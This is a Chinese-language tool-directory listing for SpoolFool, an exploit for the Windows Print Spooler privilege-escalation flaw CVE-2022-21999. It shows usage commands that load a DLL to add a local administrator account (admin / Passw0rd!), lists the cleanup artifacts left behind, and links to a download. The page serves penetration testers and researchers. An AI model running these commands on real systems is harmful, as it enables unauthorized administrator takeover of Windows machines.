Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
SpoolFool — CVE-2022-21999 的漏洞利用 - Windows Print Spooler 权限提升漏洞 (LPE) | Kitploit
工具/GitHubGitHub/ly4k/spoolfool
权限提升漏洞分析漏洞利用渗透测试二进制利用
GitHubly4k/spoolfool

SpoolFool

CVE-2022-21999 的漏洞利用 - Windows Print Spooler 权限提升漏洞 (LPE)

查看仓库
7961604年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

SpoolFool

针对 CVE-2022-21999 的漏洞利用程序 - Windows 打印后台处理程序权限提升漏洞 (LPE)

详细信息

所提供的漏洞利用程序默认应在所有 Windows 桌面版本上正常工作。

完整技术细节请参阅此处的博客文章。

用法

root@kitploit:~
PS C:\SpoolFool> .\SpoolFool.exe

SpoolFool
  By Oliver Lyak (@ly4k_)

Examples:
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer'
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll -dir 'SECRET'
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer' -dir 'SECRET'

Powershell

root@kitploit:~
PS C:\SpoolFool> ipmo .\SpoolFool.ps1
PS C:\SpoolFool> Invoke-SpoolFool

SpoolFool
  By Oliver Lyak (@ly4k_)

Examples:
   -dll add_user.dll
   -dll add_user.dll -printer 'My Printer'
   -dll add_user.dll -dir 'SECRET'
   -dll add_user.dll -printer 'My Printer' -dir 'SECRET'

概念验证

以下 PoC 使用一个 DLL 创建新的本地管理员账户 admin / Passw0rd!。该 DLL(AddUser.dll)及其源代码可在本仓库中找到。

第二次运行

以下 PoC 演示了所提供的漏洞利用程序的第二次运行。请注意,此次为了加载 DLL 并未利用该漏洞。

遗留痕迹

漏洞利用程序执行后,将留下以下痕迹以供后续清理:

  • 创建的打印机驱动程序目录不会被删除
  • Payload DLL 会被复制到打印机驱动程序目录,且不会被删除
  • 创建的任何打印机都不会被删除
  • 目标打印机的 SpoolDirectory 值不会被恢复

作者

  • Oliver Lyak @ly4k_

参考资料

  • SpoolFool:Windows 打印后台处理程序权限提升 (CVE-2022-21999)
下载工具